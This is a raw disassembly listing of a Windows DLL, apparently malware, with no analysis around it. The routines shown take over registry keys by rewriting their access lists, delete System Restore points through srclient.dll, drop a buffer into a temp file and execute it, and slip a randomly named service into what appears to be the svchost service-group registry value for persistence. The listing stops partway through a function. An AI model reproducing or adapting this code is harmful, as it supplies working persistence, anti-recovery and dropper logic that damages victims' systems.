xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_9A7068: ; CODE XREF: sub_9A7054+8�j
; sub_9A7054+F�j
xor eax, eax
inc eax
retn
sub_9A7054 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A706C(int,int,PSID *ppsidOwner,int)
sub_9A706C proc near ; CODE XREF: sub_9A4358+137�p
; sub_9A471B+4A�p ...
ppDacl = dword ptr -210h
pObjectName = word ptr -20Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
ppsidOwner = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
mov eax, dword_9B8788
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_C]
push ebx
mov ebx, [ebp+ppsidOwner]
push esi
xor eax, ebp
push edi
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ecx
push eax
mov esi, 104h
lea edi, [ebp+pObjectName]
mov [ebp+ppDacl], edx
call sub_9A6F7B
test eax, eax
pop ecx
pop ecx
jz short loc_9A70CE
xor eax, eax
push eax ; ppSecurityDescriptor
push eax ; ppSacl
push [ebp+ppDacl] ; ppDacl
push eax ; ppsidGroup
push ebx ; ppsidOwner
push 5 ; SecurityInfo
push 4 ; ObjectType
lea eax, [ebp+pObjectName]
push eax ; pObjectName
call GetNamedSecurityInfoW
neg eax
sbb eax, eax
inc eax
loc_9A70CE: ; CODE XREF: sub_9A706C+3E�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn
sub_9A706C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A70DD(int,int,PSID psidOwner,int)
sub_9A70DD proc near ; CODE XREF: sub_9A4358+394�p
; sub_9A471B+211�p ...
pDacl = dword ptr -210h
pObjectName = word ptr -20Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
psidOwner = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
mov eax, dword_9B8788
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_C]
push ebx
mov ebx, [ebp+psidOwner]
push esi
xor eax, ebp
push edi
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ecx
push eax
mov esi, 104h
lea edi, [ebp+pObjectName]
mov [ebp+pDacl], edx
call sub_9A6F7B
test eax, eax
pop ecx
pop ecx
jz short loc_9A713E
push 0 ; pSacl
push [ebp+pDacl] ; pDacl
lea eax, [ebp+pObjectName]
push 0 ; psidGroup
push ebx ; psidOwner
push 5 ; SecurityInfo
push 4 ; ObjectType
push eax ; pObjectName
call SetNamedSecurityInfoW
neg eax
sbb eax, eax
inc eax
loc_9A713E: ; CODE XREF: sub_9A70DD+3E�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn
sub_9A70DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_9A714D proc near ; CODE XREF: sub_9AAAC1-1D�p
push 0 ; dwExitCode
call ExitThread
sub_9A714D endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A7156(HKEY hkey,LPCWSTR pszSubKey)
sub_9A7156 proc near ; CODE XREF: sub_9A39CF+66�p
; sub_9A39CF+71�p
hkey = dword ptr 4
pszSubKey = dword ptr 8
push 1
push [esp+4+pszSubKey]
push [esp+8+hkey]
call sub_9A7001
add esp, 0Ch
push [esp+pszSubKey] ; pszSubKey
push [esp+4+hkey] ; hkey
call SHDeleteKeyW
retn
sub_9A7156 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7177 proc near ; CODE XREF: DllMain(x,x,x)+42�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_9A2B58
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov ecx, [ebp+arg_0]
mov eax, [ecx+3Ch]
cmp eax, 1000h
jg short loc_9A71A3
add eax, ecx
mov [ebp+var_20], eax
mov eax, [eax+50h]
mov [ebp+var_1C], eax
loc_9A71A3: ; CODE XREF: sub_9A7177+1F�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_5
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A7177 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A71B6 proc near ; CODE XREF: DllMain(x,x,x)+33�p
; DATA XREF: sub_9A71B6+13�o
Buffer = _MEMORY_BASIC_INFORMATION ptr -20h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
mov ebx, VirtualQuery
push 1Ch ; dwLength
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push offset sub_9A71B6 ; lpAddress
call ebx ; VirtualQuery
test eax, eax
jz short loc_9A7211
push esi
mov esi, [ebp+Buffer.AllocationBase]
push edi
xor edi, edi
loc_9A71DB: ; CODE XREF: sub_9A71B6+43�j
push 1Ch ; dwLength
lea eax, [ebp+Buffer]
push eax ; lpBuffer
lea eax, [edi+esi]
push eax ; lpAddress
mov [ebp+var_4], edi
call ebx ; VirtualQuery
test eax, eax
jz short loc_9A71FB
cmp [ebp+Buffer.AllocationBase], esi
jnz short loc_9A71FF
add edi, 1000h
jmp short loc_9A71DB
; ---------------------------------------------------------------------------
loc_9A71FB: ; CODE XREF: sub_9A71B6+36�j
xor eax, eax
jmp short loc_9A720F
; ---------------------------------------------------------------------------
loc_9A71FF: ; CODE XREF: sub_9A71B6+3B�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax], esi
mov eax, [ebp+arg_4]
mov [eax], ecx
xor eax, eax
inc eax
loc_9A720F: ; CODE XREF: sub_9A71B6+47�j
pop edi
pop esi
loc_9A7211: ; CODE XREF: sub_9A71B6+1C�j
pop ebx
leave
retn
sub_9A71B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=198h
; int __cdecl sub_9A7214(int,DWORD nNumberOfBytesToWrite)
sub_9A7214 proc near ; CODE XREF: sub_9A8133+38�p
lpBuffer = dword ptr -218h
NumberOfBytesWritten= dword ptr -214h
var_210 = dword ptr -210h
FileName = byte ptr -20Ch
PathName = byte ptr -108h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
push ebp
lea ebp, [esp-198h]
sub esp, 218h
mov eax, dword_9B8788
and [ebp+198h+var_210], 0
push ebx
xor eax, ebp
push esi
mov [ebp+198h+var_4], eax
mov eax, [ebp+198h+arg_0]
push edi
mov [ebp+198h+lpBuffer], eax
mov ebx, 104h
push ebx ; uSize
lea eax, [ebp+198h+PathName]
push eax ; lpBuffer
call GetSystemDirectoryA
mov esi, GetTempFileNameA
lea eax, [ebp+198h+FileName]
push eax ; lpTempFileName
push 0 ; uUnique
mov edi, offset PrefixString ; "0"
push edi ; lpPrefixString
lea eax, [ebp+198h+PathName]
push eax ; lpPathName
mov [ebp+198h+var_5], 0
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9A72A0
lea eax, [ebp+198h+PathName]
push eax ; lpBuffer
push ebx ; nBufferLength
call GetTempPathA
lea eax, [ebp+198h+FileName]
push eax ; lpTempFileName
xor ebx, ebx
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+198h+PathName]
push eax ; lpPathName
mov [ebp+198h+var_5], 0
call esi ; GetTempFileNameA
jmp short loc_9A72A2
; ---------------------------------------------------------------------------
loc_9A72A0: ; CODE XREF: sub_9A7214+62�j
xor ebx, ebx
loc_9A72A2: ; CODE XREF: sub_9A7214+8A�j
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+198h+FileName]
push eax ; lpFileName
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9A7304
mov esi, [ebp+198h+nNumberOfBytesToWrite]
push ebx ; lpOverlapped
lea eax, [ebp+198h+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+198h+lpBuffer] ; lpBuffer
mov [ebp+198h+NumberOfBytesWritten], ebx
push edi ; hFile
call WriteFile
push edi ; hObject
call CloseHandle
cmp [ebp+198h+NumberOfBytesWritten], esi
lea eax, [ebp+198h+FileName]
jnz short loc_9A72FD
push ebx ; int
push eax ; lpCommandLine
call sub_9A6A21
test eax, eax
pop ecx
pop ecx
jz short loc_9A7304
mov [ebp+198h+var_210], 1
jmp short loc_9A7304
; ---------------------------------------------------------------------------
loc_9A72FD: ; CODE XREF: sub_9A7214+D1�j
push eax ; lpFileName
call DeleteFileA
loc_9A7304: ; CODE XREF: sub_9A7214+A9�j
; sub_9A7214+DE�j ...
mov ecx, [ebp+198h+var_4]
mov eax, [ebp+198h+var_210]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 198h
leave
retn
sub_9A7214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A731F proc near ; CODE XREF: sub_9A7E0F:loc_9A80F8�p
var_20 = dword ptr -20h
hLibModule = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_9A2F60
call __SEH_prolog
push offset LibFileName ; "srclient.dll"
call LoadLibraryA
mov [ebp+hLibModule], eax
and [ebp+ms_exc.disabled], 0
test eax, eax
jz short loc_9A7361
push offset aResetsr ; "ResetSR"
push eax ; hModule
call GetProcAddress
mov [ebp+var_20], eax
test eax, eax
jz short loc_9A7361
push 0
call eax
jmp short loc_9A7361
; ---------------------------------------------------------------------------
loc_9A735A: ; DATA XREF: .text:stru_9A2F60�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A735E: ; DATA XREF: .text:stru_9A2F60�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7361: ; CODE XREF: sub_9A731F+20�j
; sub_9A731F+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hLibModule] ; hLibModule
call FreeLibrary
call __SEH_epilog
retn
sub_9A731F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7374 proc near ; CODE XREF: sub_9A7E0F+68�p
var_2054 = dword ptr -2054h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2048 = dword ptr -2048h
ResumeHandle = dword ptr -2044h
var_2040 = dword ptr -2040h
var_203C = dword ptr -203Ch
pcbBytesNeeded = dword ptr -2038h
dwBytes = dword ptr -2034h
var_2030 = dword ptr -2030h
hSCObject = dword ptr -202Ch
ServicesReturned= dword ptr -2028h
var_2024 = dword ptr -2024h
hMem = dword ptr -2020h
Buffer = _QUERY_SERVICE_CONFIGW ptr -201Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9A2F70
push offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 203Ch
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_2040], ebx
mov [ebp+var_4], ebx
push 20005h ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
call OpenSCManagerW
mov [ebp+hSCObject], eax
cmp eax, ebx
jz loc_9A75FF
mov [ebp+dwBytes], ebx
mov [ebp+ServicesReturned], ebx
mov [ebp+ResumeHandle], ebx
mov [ebp+hMem], ebx
mov esi, GlobalAlloc
loc_9A73F1: ; CODE XREF: sub_9A7374+F3�j
lea eax, [ebp+ResumeHandle]
push eax ; lpResumeHandle
lea eax, [ebp+ServicesReturned]
push eax ; lpServicesReturned
lea eax, [ebp+dwBytes]
push eax ; pcbBytesNeeded
push [ebp+dwBytes] ; cbBufSize
push [ebp+hMem] ; lpServices
push 3 ; dwServiceState
push 30h ; dwServiceType
push [ebp+hSCObject] ; hSCManager
call EnumServicesStatusW
mov [ebp+var_204C], eax
cmp eax, ebx
jnz short loc_9A7469
call GetLastError
cmp eax, 0EAh
jnz short loc_9A7469
cmp [ebp+hMem], ebx
jz short loc_9A744D
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A744D: ; CODE XREF: sub_9A7374+CB�j
push [ebp+dwBytes] ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9A7469
mov [ebp+ResumeHandle], ebx
jmp short loc_9A73F1
; ---------------------------------------------------------------------------
loc_9A7469: ; CODE XREF: sub_9A7374+B6�j
; sub_9A7374+C3�j ...
cmp [ebp+var_204C], ebx
jz loc_9A75DF
cmp [ebp+hMem], ebx
jz loc_9A75F3
mov eax, [ebp+ServicesReturned]
shl eax, 2
push eax ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov edi, eax
mov [ebp+var_2048], edi
cmp edi, ebx
jz loc_9A75DF
mov [ebp+var_2024], ebx
or [ebp+var_203C], 0FFFFFFFFh
xor esi, esi
mov [ebp+var_2030], esi
mov ebx, 2000h
loc_9A74B9: ; CODE XREF: sub_9A7374+213�j
cmp esi, [ebp+ServicesReturned]
jnb loc_9A758C
push 20005h ; dwDesiredAccess
lea eax, [esi+esi*8]
mov ecx, [ebp+hMem]
push dword ptr [ecx+eax*4] ; lpServiceName
push [ebp+hSCObject] ; hSCManager
call OpenServiceW
mov edi, eax
mov [ebp+var_2054], edi
test edi, edi
jz loc_9A757A
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push ebx ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpServiceConfig
push edi ; hService
call QueryServiceConfigW
test eax, eax
jz short loc_9A7573
cmp [ebp+Buffer.dwStartType], 2
jnz short loc_9A7573
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push ebx ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 1 ; dwInfoLevel
push edi ; hService
call QueryServiceConfig2W
test eax, eax
jz short loc_9A7573
cmp [ebp+pcbBytesNeeded], 0
jz short loc_9A7573
lea eax, [ebp+Buffer]
mov [ebp+var_2050], eax
mov eax, [ebp+Buffer.dwServiceType]
test eax, eax
jz short loc_9A7573
cmp word ptr [eax], 0
jz short loc_9A7573
push eax ; Str
call _wcsdup
pop ecx
mov ecx, [ebp+var_2048]
mov edx, [ebp+var_2024]
mov [ecx+edx*4], eax
inc [ebp+var_2024]
loc_9A7573: ; CODE XREF: sub_9A7374+196�j
; sub_9A7374+19F�j ...
push edi ; hSCObject
call CloseServiceHandle
loc_9A757A: ; CODE XREF: sub_9A7374+178�j
inc esi
mov [ebp+var_2030], esi
mov edi, [ebp+var_2048]
jmp loc_9A74B9
; ---------------------------------------------------------------------------
loc_9A758C: ; CODE XREF: sub_9A7374+14B�j
xor esi, esi
cmp [ebp+var_2024], esi
jz short loc_9A75B3
call rand
xor edx, edx
div [ebp+var_2024]
mov [ebp+var_203C], edx
mov eax, [edi+edx*4]
mov [ebp+var_2040], eax
loc_9A75B3: ; CODE XREF: sub_9A7374+220�j
; sub_9A7374+260�j
mov [ebp+var_2030], esi
cmp esi, [ebp+var_2024]
jnb short loc_9A75D6
cmp [ebp+var_203C], esi
jz short loc_9A75D3
push dword ptr [edi+esi*4] ; Memory
call free
pop ecx
loc_9A75D3: ; CODE XREF: sub_9A7374+253�j
inc esi
jmp short loc_9A75B3
; ---------------------------------------------------------------------------
loc_9A75D6: ; CODE XREF: sub_9A7374+24B�j
push edi ; hMem
call GlobalFree
xor ebx, ebx
loc_9A75DF: ; CODE XREF: sub_9A7374+FB�j
; sub_9A7374+125�j
cmp [ebp+hMem], ebx
jz short loc_9A75F3
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A75F3: ; CODE XREF: sub_9A7374+107�j
; sub_9A7374+271�j
push [ebp+hSCObject] ; hSCObject
call CloseServiceHandle
loc_9A75FF: ; CODE XREF: sub_9A7374+59�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_9A7612
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
loc_9A7612: ; CODE XREF: sub_9A7374+28F�j
mov eax, [ebp+var_2040]
cmp eax, ebx
jnz short loc_9A7628
push offset Str ; Str
call _wcsdup
pop ecx
loc_9A7628: ; CODE XREF: sub_9A7374+2A6�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
leave
retn
sub_9A7374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7641 proc near ; CODE XREF: sub_9A7B42+97�p
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
Type = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
psidOwner = dword ptr -0C0h
var_BC = dword ptr -0BCh
Data = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
lpValueName = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
hKey = dword ptr -9Ch
cbData = dword ptr -98h
var_94 = dword ptr -94h
Str = dword ptr -90h
var_8C = dword ptr -8Ch
SubKey = word ptr -88h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0D8h
push offset stru_9A2FF0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
mov [ebp+Str], eax
mov ebx, ecx
mov [ebp+lpValueName], ebx
xor eax, eax
mov [ebp+var_B0], eax
push 1Ah
pop ecx
mov esi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
lea edi, [ebp+SubKey]
rep movsd
movsw
mov [ebp+var_B4], eax
mov [ebp+psidOwner], eax
lea ecx, [ebp+hKey]
push ecx ; phkResult
push 3 ; samDesired
push eax ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000002h ; hKey
mov esi, RegOpenKeyExW
call esi ; RegOpenKeyExW
mov edi, eax
cmp edi, 5
jnz short loc_9A770A
lea eax, [ebp+var_B4]
push eax ; int
lea eax, [ebp+psidOwner]
push eax ; ppsidOwner
lea eax, [ebp+SubKey]
push eax ; int
push 80000002h ; int
call sub_9A706C
push 0
lea eax, [ebp+SubKey]
push eax
push 80000002h
call sub_9A7001
add esp, 1Ch
test eax, eax
jz short loc_9A770A
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
push 0 ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000002h ; hKey
call esi ; RegOpenKeyExW
mov edi, eax
loc_9A770A: ; CODE XREF: sub_9A7641+73�j
; sub_9A7641+AC�j
test edi, edi
jnz loc_9A7B03
and [ebp+ms_exc.disabled], edi
mov [ebp+cbData], 1
mov [ebp+Type], 7
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push edi ; lpReserved
push ebx ; lpValueName
push [ebp+hKey] ; hKey
mov edi, RegQueryValueExW
call edi ; RegQueryValueExW
mov [ebp+var_E0], eax
cmp eax, 0EAh
jnz loc_9A7AEA
push [ebp+Str] ; Str
mov esi, wcslen
call esi ; wcslen
pop ecx
mov ecx, [ebp+cbData]
lea eax, [ecx+eax*2+2]
mov [ebp+var_DC], eax
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
mov [ebp+var_D4], ebx
test ebx, ebx
jz loc_9A7AEA
mov [ebp+var_D8], 7
lea eax, [ebp+cbData]
push eax ; lpcbData
push ebx ; lpData
lea eax, [ebp+var_D8]
push eax ; lpType
push 0 ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call edi ; RegQueryValueExW
test eax, eax
jnz loc_9A7AE3
mov [ebp+var_BC], ebx
push [ebp+Str] ; Str
call esi ; wcslen
pop ecx
test eax, eax
jz short loc_9A784B
mov eax, [ebp+cbData]
test eax, eax
jz short loc_9A77EA
lea edi, [eax-2]
jmp short loc_9A77EC
; ---------------------------------------------------------------------------
loc_9A77EA: ; CODE XREF: sub_9A7641+1A2�j
xor edi, edi
loc_9A77EC: ; CODE XREF: sub_9A7641+1A7�j
mov [ebp+var_E8], edi
shr edi, 1
push [ebp+Str] ; Source
lea eax, [ebx+edi*2]
push eax ; Dest
call wcscpy
push [ebp+Str] ; Str
call esi ; wcslen
add esp, 0Ch
add eax, edi
and word ptr [ebx+eax*2+2], 0
push [ebp+var_DC] ; cbData
push ebx ; lpData
push 7 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExW
test eax, eax
jnz loc_9A7AE3
mov [ebp+var_B0], 1
jmp loc_9A7AE3
; ---------------------------------------------------------------------------
loc_9A784B: ; CODE XREF: sub_9A7641+198�j
xor edi, edi
mov [ebp+var_8C], edi
and [ebp+var_94], edi
loc_9A7859: ; CODE XREF: sub_9A7641+243�j
cmp edi, [ebp+cbData]
jnb short loc_9A7886
mov eax, [ebp+var_BC]
lea eax, [eax+edi*2]
cmp word ptr [eax], 0
jz short loc_9A7886
inc [ebp+var_94]
push eax ; Str
call esi ; wcslen
pop ecx
lea edi, [edi+eax+1]
mov [ebp+var_8C], edi
jmp short loc_9A7859
; ---------------------------------------------------------------------------
loc_9A7886: ; CODE XREF: sub_9A7641+21E�j
; sub_9A7641+22D�j
mov eax, [ebp+var_94]
lea eax, ds:4[eax*4]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_C8], edi
test edi, edi
jz loc_9A7AE3
xor ebx, ebx
mov [ebp+var_8C], ebx
and [ebp+var_A0], ebx
loc_9A78BA: ; CODE XREF: sub_9A7641+2AD�j
cmp ebx, [ebp+cbData]
jnb short loc_9A78F0
mov eax, [ebp+var_BC]
lea eax, [eax+ebx*2]
cmp word ptr [eax], 0
jz short loc_9A78F0
mov ecx, [ebp+var_A0]
mov [edi+ecx*4], eax
push eax ; Str
call esi ; wcslen
pop ecx
lea ebx, [ebx+eax+1]
mov [ebp+var_8C], ebx
inc [ebp+var_A0]
jmp short loc_9A78BA
; ---------------------------------------------------------------------------
loc_9A78F0: ; CODE XREF: sub_9A7641+27F�j
; sub_9A7641+28E�j
mov ebx, rand
loc_9A78F6: ; CODE XREF: sub_9A7641+32D�j
and [ebp+var_C4], 0
call ebx ; rand
xor edx, edx
push 18h
pop ecx
div ecx
push off_9B8208[edx*4] ; Source
push [ebp+Str] ; Dest
call wcscpy
call ebx ; rand
xor edx, edx
push 11h
pop ecx
div ecx
push off_9B8268[edx*4] ; Source
push [ebp+Str] ; Dest
call wcscat
add esp, 10h
xor eax, eax
mov [ebp+var_8C], eax
loc_9A7940: ; CODE XREF: sub_9A7641+37A�j
cmp eax, [ebp+var_94]
jnb short loc_9A7967
push [ebp+Str] ; Str2
push dword ptr [edi+eax*4] ; Str1
call _wcsicmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9A79AF
mov [ebp+var_C4], 1
loc_9A7967: ; CODE XREF: sub_9A7641+305�j
cmp [ebp+var_C4], 0
jnz short loc_9A78F6
xor eax, eax
mov [ebp+var_A8], eax
mov [ebp+var_A4], eax
loc_9A797E: ; CODE XREF: sub_9A7641+36C�j
mov [ebp+var_8C], eax
cmp eax, [ebp+var_94]
jnb short loc_9A79C8
mov edx, [ebp+Str]
mov ecx, [edi+eax*4]
mov cx, [ecx]
cmp [ebp+var_A8], 0
jnz short loc_9A79BD
cmp cx, [edx]
jnz short loc_9A79AC
mov [ebp+var_A8], eax
loc_9A79AC: ; CODE XREF: sub_9A7641+363�j
; sub_9A7641+37F�j
inc eax
jmp short loc_9A797E
; ---------------------------------------------------------------------------
loc_9A79AF: ; CODE XREF: sub_9A7641+31A�j
inc [ebp+var_8C]
mov eax, [ebp+var_8C]
jmp short loc_9A7940
; ---------------------------------------------------------------------------
loc_9A79BD: ; CODE XREF: sub_9A7641+35E�j
cmp cx, [edx]
jz short loc_9A79AC
mov [ebp+var_A4], eax
loc_9A79C8: ; CODE XREF: sub_9A7641+349�j
cmp [ebp+var_A4], 0
jnz short loc_9A79DD
mov eax, [ebp+var_94]
mov [ebp+var_A4], eax
loc_9A79DD: ; CODE XREF: sub_9A7641+38E�j
call ebx ; rand
mov ecx, [ebp+var_A4]
sub ecx, [ebp+var_A8]
xor edx, edx
div ecx
add edx, [ebp+var_A8]
mov [ebp+var_A0], edx
mov eax, [ebp+var_94]
loc_9A7A01: ; CODE XREF: sub_9A7641+3D2�j
mov [ebp+var_8C], eax
cmp eax, edx
jbe short loc_9A7A15
mov ecx, [edi+eax*4-4]
mov [edi+eax*4], ecx
dec eax
jmp short loc_9A7A01
; ---------------------------------------------------------------------------
loc_9A7A15: ; CODE XREF: sub_9A7641+3C8�j
mov eax, [ebp+Str]
mov [edi+edx*4], eax
push eax ; Str
call esi ; wcslen
pop ecx
mov ecx, [ebp+cbData]
lea eax, [ecx+eax*2+2]
mov [ebp+var_CC], eax
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
mov [ebp+var_E4], ebx
test ebx, ebx
jz loc_9A7AD6
and [ebp+var_8C], 0
xor edi, edi
mov [ebp+var_A0], edi
loc_9A7A5A: ; CODE XREF: sub_9A7641+456�j
mov eax, [ebp+var_94]
inc eax
mov ecx, [ebp+var_8C]
cmp ecx, eax
jnb short loc_9A7A99
lea eax, [ebx+edi*2]
mov edx, [ebp+var_C8]
push dword ptr [edx+ecx*4] ; Source
push eax ; Dest
call wcscpy
lea eax, [ebx+edi*2]
push eax ; Str
call esi ; wcslen
add esp, 0Ch
lea edi, [edi+eax+1]
mov [ebp+var_A0], edi
inc [ebp+var_8C]
jmp short loc_9A7A5A
; ---------------------------------------------------------------------------
loc_9A7A99: ; CODE XREF: sub_9A7641+428�j
and word ptr [ebx+edi*2], 0
push [ebp+var_CC] ; cbData
push ebx ; lpData
push 7 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExW
test eax, eax
jnz short loc_9A7AC9
mov [ebp+var_B0], 1
loc_9A7AC9: ; CODE XREF: sub_9A7641+47C�j
push ebx ; hMem
call GlobalFree
mov edi, [ebp+var_C8]
loc_9A7AD6: ; CODE XREF: sub_9A7641+404�j
push edi ; hMem
call GlobalFree
mov ebx, [ebp+var_D4]
loc_9A7AE3: ; CODE XREF: sub_9A7641+181�j
; sub_9A7641+1F5�j ...
push ebx ; hMem
call GlobalFree
loc_9A7AEA: ; CODE XREF: sub_9A7641+118�j
; sub_9A7641+150�j
push [ebp+hKey] ; hKey
call RegCloseKey
jmp short loc_9A7AFF
; ---------------------------------------------------------------------------
loc_9A7AF8: ; DATA XREF: .text:stru_9A2FF0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7AFC: ; DATA XREF: .text:stru_9A2FF0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7AFF: ; CODE XREF: sub_9A7641+4B5�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9A7B03: ; CODE XREF: sub_9A7641+CB�j
cmp [ebp+var_B4], 0
jz short loc_9A7B2C
push [ebp+var_B4] ; int
push [ebp+psidOwner] ; psidOwner
lea eax, [ebp+SubKey]
push eax ; int
push 80000002h ; int
call sub_9A70DD
add esp, 10h
loc_9A7B2C: ; CODE XREF: sub_9A7641+4C9�j
mov eax, [ebp+var_B0]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A7641 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=104h
; int __cdecl sub_9A7B42(int,int,int,wchar_t *Str)
sub_9A7B42 proc near ; CODE XREF: sub_9A7E0F+171�p
phkResult = dword ptr -184h
var_180 = dword ptr -180h
lpData = dword ptr -17Ch
psidOwner = dword ptr -178h
var_174 = dword ptr -174h
var_170 = dword ptr -170h
hMem = dword ptr -16Ch
var_168 = dword ptr -168h
Data = byte ptr -164h
hKey = dword ptr -160h
Source = word ptr -15Ch
SubKey = word ptr -110h
var_48 = dword ptr -48h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
push ebp
lea ebp, [esp-104h]
sub esp, 184h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+104h+var_4], eax
mov eax, [ebp+104h+arg_0]
push ebx
push esi
mov [ebp+104h+var_170], eax
